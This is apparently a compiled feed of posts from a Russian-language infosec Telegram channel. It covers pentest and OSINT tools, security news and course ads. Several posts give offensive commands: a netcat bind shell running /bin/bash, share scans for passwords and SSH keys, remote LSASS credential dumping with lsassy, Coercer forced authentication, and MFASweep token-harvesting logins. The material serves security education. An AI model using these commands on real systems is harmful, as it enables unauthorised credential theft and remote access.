Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
😼Netcat: Тайный Агент для Сетевой Диагностики
Netcat (или nc) — это инструмент, который называют «швейцарским ножом» для сетевых администраторов и хакеров. В чем его секрет и почему он так ценен? Давайте разберемся.
nc -zv example.com 80-443
-z
проверяет только открытые порты, а -v
выводит информацию о процессе. Вы получите список открытых портов на сервере.nc example.com 80
GET / HTTP/1.1
Host: example.com
nc -lvp 4444 -e /bin/bash
/bin/bash
. На локальной машине подключаемся:nc remote-server 4444
GoSearch
GoSearch — эффективный и надежный инструмент OSINT, разработанный для обнаружения цифровых следов, связанных с определенным именем пользователя.
🔸Он быстрый, простой и надежный, позволяя пользователям отслеживать присутствие человека в сети на нескольких платформах.
🔸GoSearch также интегрирует данные из базы данных HudsonRock Cybercrime Intelligence Database для предоставления информации, связанной с киберпреступностью.
🔸Он также подключается к базе данных BreachDirectory.org, предлагая доступ к полному списку утечек данных, текстовым и хешированным паролям, связанным с именем пользователя.
🔸Этот инструмент идеально подходит для тех, кому нужны точные, простые результаты при расследовании онлайн-идентификации.
❕Главная цель этого инструмента — обеспечить простой и эффективный способ проверки присутствия человека в интернете, выявления его цифрового следа и, в некоторых случаях, даже получения информации о компрометированных данных, связанных с его профилем.
📎Возможности:
⏺️Поиск по широкому кругу платформ
⏺️Интеграция с базами данных утечек
⏺️Высокая скорость работы
⏺️Удобство и гибкость
⏺️После работы программы вывод сохраняется в txt файле
📌Установка:
git clone https://github.com/ibnaleem/gosearch
go build
sudo cp gosearch /usr/bin
go run gosearch.go
go run gosearch.go -u hacker
Если вы укажите api-ключ от BreachDirectory.org, вывод станет более подробным.Читать полностью…
🚩 Новые задания на платформе Codeby Games!
🔎 Категория OSINT — История одного фото
🌍 Категория Веб — Форум предсказателей
Приятного хакинга!
manspider — инструмент предназначенный для сканирования всех общих папок в целевых системах. Поддерживает большое количество типов файлов (pdf, docx, xlsx, pptx, любые текстовые форматы и др.). В качестве цели могут быть указаны IP, hostname, подсети, файлы.
🐍 Установка:
pipx install git+https://github.com/blacklanternsecurity/MANSPIDER
apt install tesseract-ocr
apt install antiword
manspider 192.168.0.0/24 -f passw user admin account network login logon cred -d evilcorp -u user -p pass
manspider share.evilcorp.local -c passw -e xlsx csv docx pdf -d evilcorp -u user -p pass
manspider share.evilcorp.local -e ppk rsa pem ssh rsa -o -f id_rsa id_dsa id_ed25519 -d evilcorp -u user -p passЧитать полностью…
За 2024 год зарегистрировано уже около 29 000 новых CVE. Но далеко не все уязвимости реально используются в атаках, и установить патчи сразу на всё просто невозможно. Как понять, какие угрозы критичны, а какие могут подождать?
Для этого существуют методики приоритизации уязвимостей, которые помогают оценить их опасность и определить, на какие угрозы реагировать в первую очередь.
🔸 CVSS (Common Vulnerability Scoring System) – самая популярная система оценки (от 0 до 10), но в открытом доступе обычно публикуют только базовые метрики, а реальный риск нужно рассчитывать отдельно.
🔸 EPSS (Exploit Prediction Scoring System) – предсказывает вероятность эксплуатации уязвимости в течение ближайших 30 дней, но не учитывает специфические контекстные факторы.
🔸 SSVC (Stakeholder-Specific Vulnerability Categorization) – вместо оценки опасности говорит КАК организация должна реагировать на уязвимость: немедленно исправлять, мониторить или просто отслеживать.
🔸 VISS (Vulnerability Impact Scoring System) – система от Zoom с 100-балльной шкалой, учитывающая влияние уязвимости на платформу, данные и инфраструктуру.
🔸 SSPP (Stakeholder-Specific Patching Prioritization) – методика для управления патчами: анализирует, были ли атаки, есть ли эксплойты и насколько уязвимо ПО в конкретной среде.
💡 Вывод: не существует идеальной системы, но можно комбинировать подходы. Например, CVSS + EPSS позволяет учитывать как технические параметры, так и реальный риск эксплуатации уязвимости.
Какой метод используете вы? Делитесь в комментариях!
➡️Читать статью полностью
Sublist3r: Охота на скрытые субдомены
Sublist3r — это инструмент с открытым исходным кодом, предназначенный для поиска субдоменов доменов, помогает обнаружить скрытые поддомены, которые могут быть уязвимыми или предоставлять информацию о структуре веб-приложений.
git clone https://github.com/aboul3la/Sublist3r.git
cd Sublist3r
pip3 install -r requirements.txt
python3 sublist3r.py -d example.com
python3 sublist3r.py -d example.com -o output.txt -p 50
🔎 Snaffler — инструмент, помогающий находить полезную информацию (учетные записи, ключи и т.д.) в среде Windows/Active Directory. Snaffler поставляется с набором стандартных правил, встроенных в .exe. Они находятся в /Snaffler/SnaffRules/DefaultRules. При желании можно написать свои правила в формате .toml и указать до них путь при запуске утилиты -p .\path\to\rules.
Скачать скомпилированный инструмент можно по ссылке.
🏃 Обычный запуск может осуществляться следующей командой. Через -o передается файл куда записываются результаты, -s выводит результаты в консоль.
snaffler.exe -s -o snaffler.log
🔮Kismet: Магия Wi-Fi анализа для хакеров и исследователей
Kismet — это мощный анализатор сети Wi-Fi с открытым исходным кодом, который позволяет исследовать и отслеживать радиочастотное пространство.
С помощью Kismet можно не только анализировать трафик, но и заниматься разведкой на более глубоком уровне, включая мониторинг нестандартных частот и анализ помех.
1️⃣ Установка
Для начала вам нужно установить Kismet. Процесс зависит от операционной системы. Например, на Linux:
sudo apt-get install kismet
sudo kismet
Coercer — скрипт на Python для автоматического принуждения сервера Windows к аутентификации на произвольном компьютере с помощью множества методов. Установка осуществляется с помощью команды python3 -m pip install coercer
.
3 режима работы:
⏺️scan - проверка методов с известными рабочими путями для всех методов;
⏺️coerce - запуск принудительной аутентификации через все известные методы с известными рабочими путями. В данном режим на своей машине также необходимо запустить responder;
⏺️fuzz - проверка каждого метода со списком путей эксплойта.
💻 Примеры использования:
Анализ удалённых процедур на компьютере, чтобы понять, можно ли использовать их для принудительной аутентификации. Целевой хост передается через -t.
coercer scan -u user -p pass -t 10.0.0.8 -v
coercer coerce -u user -p pass -l 10.0.0.80 -t 10.0.0.8 --always-continue
coercer fuzz -u user -p pass -t 10.0.0.8 -vЧитать полностью…
AD: как работает, как ломают и как защитить? Разбираемся в карточках.
➡️Новый поток курса по Active Directory стартует 3 марта. Попробуйте взлом и защиту на практике в нашей лаборатории. Регистрация
Исследователи Reversing Labs обнаружили две вредоносные ML-модели на Hugging Face, крупнейшей платформе для обмена AI-моделями. Несмотря на наличие в них вредоносного кода, инструменты безопасности Hugging Face не отметили их как «опасные».
❓ Как работает атака?
Злоумышленники использовали уязвимость Pickle-файлов – формата сериализации в Python, который может исполнять код во время загрузки модели. Хотя вредоносные Pickle-файлы встречаются не впервые, исследователи выявили новую технику обхода защиты Picklescan – сканера, используемого Hugging Face для выявления угроз.
🔍 Метод nullifAI
Атакующие упаковали модели в формате PyTorch, но вместо стандартного ZIP использовали 7z, что сделало их невидимыми для Picklescan. Более того, файлы содержали «сломанные» Pickle-инструкции, из-за чего сканер не мог их корректно проверить.
💡 Проблемы в безопасности Hugging Face
Эксперты считают, что Hugging Face полагается на черный список опасных функций, что не защищает от новых угроз. Picklescan проверяет Pickle-файлы перед анализом, но сам механизм десериализации исполняет команды по мере их считывания. Вредоносный код в начале потока может обойти защиту и остаться незамеченным.
🗣️ Reversing Labs сообщили о проблеме в службу безопасности Hugging Face. Модели удалили в течение 24 часов, а Picklescan обновили, чтобы он мог обнаруживать угрозы в «сломанных» Pickle-файлах.
Google тайно установил приложение, которое сканирует фото на вашем смартфоне 👀
Пользователи Android внезапно обнаружили на своих устройствах новое системное приложение — Android System SafetyCore. Оно устанавливается без согласия пользователей и работает в фоновом режиме.
После паники в интернете Google спустя несколько дней всё-таки подтвердил, что это приложение анализирует изображения в Google Messages и скрывает откровенный контент.
Что именно делает SafetyCore?
🔸 Приложение автоматически сканирует изображения в Google Messages на наличие 18+ контента.
🔸 Если обнаружен откровенный снимок, он размывается (блюрится) и появляется предупреждение.
🔸 Google заявляет, что вся обработка происходит на устройстве и файлы не загружаются в облако.
Почему пользователи возмущены?
1️⃣ Приложение установилось скрытно.
Google даже не уведомил пользователей о том, что добавляет новую систему сканирования изображений. Просто однажды люди заметили у себя на телефонах приложение, которое они не устанавливали.
2️⃣ Жрёт ресурсы.
SafetyCore требует около 2 ГБ оперативной памяти, что делает его непригодным для слабых смартфонов. Владельцы бюджетных Android-устройств уже жалуются на лаги и подвисания.
3️⃣ Кому-то это нужно?
Приложение работает только в Google Messages, а этот мессенджер почти никто не использует. Но Google всё равно принудительно загнал SafetyCore на миллионы устройств.
4️⃣ Сегодня не отправляет, а завтра?
Google уверяет, что фото остаются на устройстве и не передаются в облако. Но многие пользователи не верят в это. Уже сейчас компания собирает кучу данных о пользователях для таргетированной рекламы.
5️⃣ Что, если ИИ ошибётся?
Блюрятся только "откровенные" фото? А если система решит, что что-то на вашей картинке — это "неподобающий контент"? У Google уже были проблемы с алгоритмами, которые ошибочно блокировали пользователей и контент.
Google снова тестирует границы дозволенного. Как вам такое обновление?
#новости
lsassy — инструмент, написанный на Python для удалённого извлечения учётных данных на нескольких хостах. Он использует проект impacket для удалённого считывания необходимых байтов в дампе lsass и pypykatz для извлечения учётных данных.
🐍 Установка производится в одну команду python3 -m pip install lsassy
😮 Поддерживает различные методы дампа: comsvcs, comsvcs_stealth, dllinject, dumpert, dumpertdll, edrsandblast, mirrordump, mirrordump_embedded, nanodump, nanodump_ssp_embedded, ppldump, ppldump_embedded, procdump, procdump_embedded, rawrpc, rawrpc_embedded, rdrleakdiag, silentprocessexit, sqldumper, wer.
🔑 Аутентификация возможна через хеш (-H), по билету (-k) и паролю (-p). Для успешной работы утилиты у пользователя должны быть права локального администратора на удалённых устройствах.
В качестве цели могут быть указаны ip адреса, диапазон адресов, CIDR, hostname, FQDN, файл.
lsassy -d dom.lab -u user -p pass 192.168.1.0/24
lsassy -d hackn.lab -u user -p pass dc.dom.lab -m procdump -O procdump_path=/opt/Sysinternals/procdump.exe
lsassy -d hackn.lab -u user -p pass dc.dom.lab -K '/tmp/kerberos_tickets'
lsassy -d hackn.lab -u pixis -p P4ssw0rd dc01.hackn.lab -M '/tmp/keys.txt'Читать полностью…
Благодарим за отзывы на курс «Анализ защищенности инфраструктуры на основе технологий Active Directory»! 😎
280 учеников уже успешно освоили AD при поддержке наших кураторов. Ждём вас!
➡️Новый поток стартует 3 марта. Регистрация
Как побеждать в CTF? Обсудим с пентестером, создателем CTF-тасков и победителем The Standoff 14 — Магомедом Эми-Межидовым! 😎
В новом видео обсудим:
🔸 Как начать участвовать в CTF и какие бывают задания?
🔸 Секрет победы на Standoff 14
🔸 Как создаются CTF-задания?
🔸 Как CTF помогает построить карьеру в кибербезопасности?
🔸 Российские площадки для CTF (спойлер — Codeby Games)
➡️Cмотреть интервью
CTF-соревнования — это не просто хакерские битвы, а возможность прокачать навыки и найти работу в топовых компаниях! Тренируйтесь и побеждайте на codeby.games 🚩
Как провести успешный пентест, взломать AD, скомпрометировать всё, что можно, и выйти из сети заказчика победителем?
Изучите техники и методики атак на инфраструктуру Active Directory на курсе от Академии Кодебай! 😎
Наша практическая лаборатория содержит более 30 виртуальных машин, которые вам предстоит сломать. Начинаем 3 марта, регистрация — здесь.
Содержание курса:
🔴 Архитектура AD и ее базис
🔴 Харденинг в AD, добыча критичной информации, развитие по инфраструктуре
🔴 Захват и укрепление позиций внутри инфраструктуры
🔴 Применение и анализ популярных эксплоитов
Авторы курса: HackerRalf (Михаил Порываев) и BlackRabbit (Павел Никитин), 5-кратные победители the Standoff
Узнайте полную программу курса @Codeby_Academy 🚀
🧭 Новый уровень защиты против телефонных мошенников от Google
Google продолжает улучшать безопасность своей операционной системы Android, представляя новые механизмы защиты пользователей. Одной из последних разработок стала функция, которая предотвращает изменение критически важных настроек во время телефонных звонков. Это нововведение направлено на борьбу с растущими угрозами, связанными с телефонными мошенниками, которые используют тактики социальной инженерии для установки вредоносных приложений.
❓ Что такое TOAD и почему это важно?
Новая функция направлена на противодействие так называемым атакам TOAD (telephone-oriented attack delivery). Этот метод включает:
➡️Отправку SMS-сообщений, побуждающих жертву срочно позвонить на указанный номер.
➡️Использование телефонного разговора для создания ложного чувства срочности и убеждения жертвы выполнить опасные действия, такие как установка вредоносного ПО.
Примером таких атак является распространение приложений-дропперов, как было выявлено исследователями NCC Group и Национальным центром кибербезопасности Финляндии (NCSC-FI). Злоумышленники с помощью телефонных звонков и SMS обманом заставляли пользователей устанавливать вредоносные программы, такие как Vultr.
🗡 Как работает новая защита
Функция блокирует действия, которые мошенники часто требуют от пользователей во время телефонных разговоров:
➡️Включение установки приложений из неизвестных источников.
➡️Предоставление приложению доступа к функциям доступности.
При попытке изменить эти настройки во время звонка пользователи получают сообщение:
“Мошенники часто просят выполнять такие действия во время телефонных разговоров, поэтому эти действия заблокированы для вашей защиты. Если вас просят сделать это незнакомые люди, это может быть мошенничество.”
Кроме того, функция предотвращает предоставление приложению доступа к функциям доступности, пока звонок не завершится.
Эта функция уже доступна в Android 16 Beta 2, выпущенной на этой неделе.Читать полностью…
Overpass Turbo — веб-инструмент, позволяющий делать сложные запросы к базе данных OpenStreetMap и визуализировать результаты на карте. С ним можно выполнять любые запросы по собственным заданным параметрам поиска и анализировать их на интерактивной карте. Для этого в инструменте используется язык запросов Overpass Query Language. Операторы в нем выполняются один за другим. Каждый опратор должен заканчиваться точкой с запятой, которая является разделителем между ними. В интерфейсе Overpass Turbo в правой части имеется карта, в левой - поле для ввода запросов на языке Overpass QL.
🗺 Перед использованием инструмента необходимо познакомится с OpenStreetMap ("открытая карта улиц") — некоммерческий веб-картографический проект, созданный обычными пользователями в виде подробной свободной и бесплатной географической карты мира. Особенностью данной карты является то, что любой зарегистрированный пользователь может вносить в неё изменения. Разработана в 2004 году. С 2005 по 2022 год количество зарегистрированных участников выросло до 9 млн.
Пользователь может скачать любую часть или всю карту OpenStreetMap для использования в оффлайне. Таким образом, он может использовать скачанные данные для навигации, абсолютно не передавая информацию о местоположении сторонним сервисам.
🖥Вся информация в OpenStreetMap представлена в виде набора точек, линий и отношений.
⏺️Nodes — базовые единицы данных с координатами (широта и долгота). Используются для обозначения отдельных объектов, таких как деревья, остановки, колодцы.
⏺️Ways — последовательности точек, образующие дороги, реки, границы, здания и другие линейные объекты.
⏺️Relations — объединяют точки, линии и другие отношения в более сложные структуры с некоторыми свойствами, например автобусный маршрут.
Каждый объект снабжен тегами – парами ключ-значение, которые описывают его характеристики. Данные OSM хранятся в виде XML или бинарного формата PBF, оптимизированного для быстрого чтения и обработки.
Вот так выглядит пример запроса в Overpass Turbo, который находит все аптеки в Москве:
[out:json];Читать полностью…
area[name="Москва"]->.searchArea;
(
node["amenity"="pharmacy"](area.searchArea);
);
out center;
Arjun
Инструмент находит допустимые параметры HTTP с помощью огромного словаря по умолчанию, содержащего 25 890 имен параметров. Чтобы просмотреть этот огромный список, потребуется менее 10 секунд, при этом будет сделано всего 50–60 запросов к цели.
📎Возможности:
⏺️Поддерживает запросы GET/POST/POST-JSON/POST-XML;
⏺️Автоматически обрабатывает ограничения скорости и тайм-ауты;
⏺️Экспорт результатов в: BurpSuite, текстовый или JSON-файл;
⏺️Импортировать цели из: BurpSuite, текстового файла или необработанного файла запроса;
⏺️Может пассивно извлекать параметры из JS или 3 внешних источников.
📌Установка:
sudo apt install arjun
pip install ratelimit
arjun -u http://127.0.0.1/
-o
или -oJ
:arjun -u http://127.0.0.1/ -o out.txt
-oT
:arjun -u http://127.0.0.1/ -oT out.txt
На конференции K2 Cloud Conf расскажем, как достучаться
до инфраструктуры, развернутой в облаке.
Обсудим разные подходы: от внешних IP-адресов до сложных топологий гибридного облака, где помимо встроенных средств сетевой безопасности можно использовать NGFW для инспектирования всего или почти всего трафика.
4-го марта. Онлайн и офлайн. Бесплатно.
Подробнее тут
Cobalt Strike: Шахматная доска для хакеров — играем по-крупному
Cobalt Strike — это фреймворк для постэксплуатации, который используется для имитации атак с целью проверки защиты систем. Его цель — помочь профессионалам эффективно воспроизводить реальные угрозы и тестировать защитные механизмы.
В ближайшие месяцы ИБ-специалисты смогут посетить ряд значимых для комьюнити мероприятий. Представляем подборку из пяти крупных конференций:
1️⃣ ИБ АСУ ТП КВО 2025
➡️ Дата: 4–5 марта 2025 года
➡️ Место: Москва, ул. Вильгельма Пика, 16, Soluxe Hotel Moscow 5*
Мероприятие по защите автоматизированных систем управления технологическими процессами (АСУ ТП). Ведущие специалисты обсудят актуальные угрозы, регуляторные требования и лучшие практики безопасности. 35 докладчиков, 500 делегатов и 700 участников.
🔴 Подробнее
2️⃣ AppSecFest 2025
➡️ Дата: 25 апреля 2025 года
➡️ Место: Алматы, Казахстан
Конференция по безопасности веб- и мобильных приложений, DevSecOps и современным методам защиты ПО. В программе — разбор актуальных атак, мастер-классы и выступления ведущих экспертов.
🔴 Подробнее
3️⃣ ИНФОФОРУМ-Тюмень 2025
➡️ 22–25 апреля 2025
➡️ г. Тюмень, Тюменский Технопарк
Первая межрегиональная конференция по информационной безопасности в Уральском федеральном округе объединит ведущих специалистов в сфере ИБ, представителей госструктур, бизнеса и разработчиков технологий для обсуждения киберугроз, защиты критической инфраструктуры и импортозамещения в отрасли.
🔴 Подробнее
4️⃣ Positive Hack Days (PHDays) 2025
➡️ Дата: 22-24 мая 2025 года
➡️ Место: Москва, "Лужники"
Один из крупнейших форумов по кибербезопасности в России. В программе: кибербитвы, практические воркшопы, презентации от международных и российских экспертов.
🔴 Подробнее
5️⃣ ЦИПР 2025 (Цифровая индустрия промышленной России)
➡️ Дата: 3–6 июня 2025 года
➡️ Место: Нижний Новгород, Россия
Форум о цифровой трансформации и информационной безопасности в промышленности и госсекторе. В центре внимания — импортозамещение, защита критической инфраструктуры и развитие отечественного ИБ-рынка.
🔴 Подробнее
А на какие пойдете вы? Пишите в комментариях!
mitmproxy2swagger — утилита для автоматического преобразования захваченного трафика через mitmproxy в OpenAPI Specification. Установка происходит через pip3 install mitmproxy2swagger
или docker:
git clone git@github.com:alufers/mitmproxy2swagger.git
cd mitmproxy2swagger
docker build -t mitmproxy2swagger .
mitmweb
. Теперь необходимо настроить браузер, чтобы весь трафик проходил через mitmproxy.mitmproxy2swagger -i <path_to_mitmptoxy_file> -o <path_to_output_schema> -p <api_prefix>
mitmproxy2swagger -i <path_to_mitmptoxy_file> -o <path_to_output_schema> -p <api_prefix>
Как обнаружить скрытые угрозы в вашей сети с помощью Nessus
Nessus — это популярный инструмент для сканирования уязвимостей, разработанный компанией Tenable, который направлен на выявление слабых мест в системах и сетях, предотвращая возможные атаки.
sudo apt install nessus
sudo systemctl start nessusd
nessuscli login -u <username> -p <password>
nessuscli scan --name "Network Scan" --targets "192.168.1.0/24" --policy "basic-network-scan"
nessuscli report --scan-id <scan_id>
MFASweep — PowerShell скрипт, пытающийся выполнить вход в различные службы Microsoft, используя предоставленные учётные данные, и определяет, включена ли многофакторная аутентификация. Он также выполняет дополнительную проверку конфигурации ADFS. По умолчанию скрипт пытается войти в указанную учётную запись десять раз.
👀 Имеется возможность входа в следующие сервисы:
⏺️Microsoft Graph API (Invoke-GraphAPIAuth
)
⏺️Azure Service Management API (Invoke-AzureManagementAPIAuth
)
⏺️Microsoft 365 Exchange Web Services (Invoke-EWSAuth
)
⏺️Microsoft 365 Web Portal (Invoke-O365WebPortalAuth
)
⏺️Microsoft 365 Active Sync (Invoke-O365ActiveSyncAuth
)
⏺️ADFS (Invoke-ADFSAuth
)
💡 Примеры использования:
Команда будет пытаться войти во все сервисы кроме ADFS. При успешном входе токены и/или файлы cookie будут записаны в AccessTokens.json.
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2025 -WriteTokens
Invoke-MFASweep -Username targetuser@targetdomain.com -Password Winter2025 -Recon -IncludeADFS
Invoke-BruteClientIDs -Username targetuser@targetdomain.com -Password Winter2025 -WriteTokensЧитать полностью…
🚩 Новые задания на платформе Codeby Games!
🏆 Категория Квесты — Микроо
🎢 Категория Разное — Love++
Приятного хакинга!
X8
Инструмент помогает идентифицировать скрытые параметры, которые потенциально могут быть уязвимы или раскрывать интересную функциональность, которую могут пропустить другие тестировщики. Его высокая точность достигается за счет построчного сравнения страниц, сравнения кодов ответов и отражений.
Преимущества:
1️⃣Быстро.
2️⃣Предлагает гибкую конфигурацию запросов за счет использования шаблонов и точек внедрения.
3️⃣Высокая масштабируемость, возможность проверки тысяч URL-адресов за один запуск.
4️⃣Обеспечивает более высокую точность по сравнению с аналогичными инструментами, особенно в сложных случаях.
5️⃣Способность обнаруживать параметры с неслучайными значениями, такими как admin=true.
6️⃣Высокая настраиваемость с широким диапазоном настраиваемых параметров.
7️⃣Достигает почти необработанных запросов за счет модификации внешней библиотеки
💡Примеры использования:
✔️Проверить параметры в запросе
x8 -u "https://example.de/" -w [PATH_TO_WORDLIST]
x8 -u "https://example.de/" -X POST -w [PATH_TO_WORDLIST]
x8 -u "https://example.de/" -X POST -b '{"x":{%s}}' -w [PATH_TO_WORDLIST]
KeePassXC - это бесплатное, открытое и кроссплатформенное программное обеспечение для управления паролями. Оно позволяет пользователям безопасно хранить и управлять своими паролями, логинами и другими конфиденциальными данными.
Основные функции KeePassXC:
⏺️Хранение паролей в зашифрованной базе данных
⏺️Генерация сильных и уникальных паролей
⏺️Поиск и фильтрация записей
⏺️Импорт и экспорт данных из других менеджеров паролей
⏺️Поддержка плагинов и расширений
KeePassXC использует передовые методы шифрования, такие как AES-256 и ChaCha20, для защиты данных пользователей.
Trivy — комплексный и универсальный сканер безопасности. Автоматически сканирует на наличие известных уязвимостей, неправильных настроек, конфиденциальной информации и секретов, используемых пакетов ОС и программных зависимостей. Предоставляет детализированные отчёты о найденных уязвимостях и советы по их исправлению.
💻 Установка:
Для Debian, Ubuntu и Astra Linux можно воспользоваться следующими командами (последняя на данный момент версия):
wget https://github.com/aquasecurity/trivy/releases/download/v0.59.1/trivy_0.59.1_Linux-64bit.deb
dpkg -i trivy_0.59.1_Linux-64bit.deb
sudo apt install trivy
trivy image image_name
trivy fs ./
trivy image --severity HIGH,CRITICAL image_name
trivy k8s --output report.txt k8s_nameЧитать полностью…
⚠️ За 2024 год число кибератак на российские компании выросло в 2,5 раза. Доля заказных кибератак на российские компании за год выросла с 10% до 44%.
Что делать? — Стать востребованным специалистом!
Запишитесь на курс для BlueTeam от Академии Кодебай. Оставьте заявку на сайте — начинаем 3 марта!
Что вы освоите?
🔸 Сбор дампов памяти с Linux и Windows
🔸 Анализ журналов безопасности и артефактов ВПО
🔸 Реагирование на основе данных из SIEM
🔸 Анализ вредоносных программ
🔸 Threat Intelligence & Threat Hunting
⭐️ Сертификат / удостоверение о повышении квалификации
Научитесь реагировать на сетевые вторжения! Пишите 🚀 @Codeby_Academy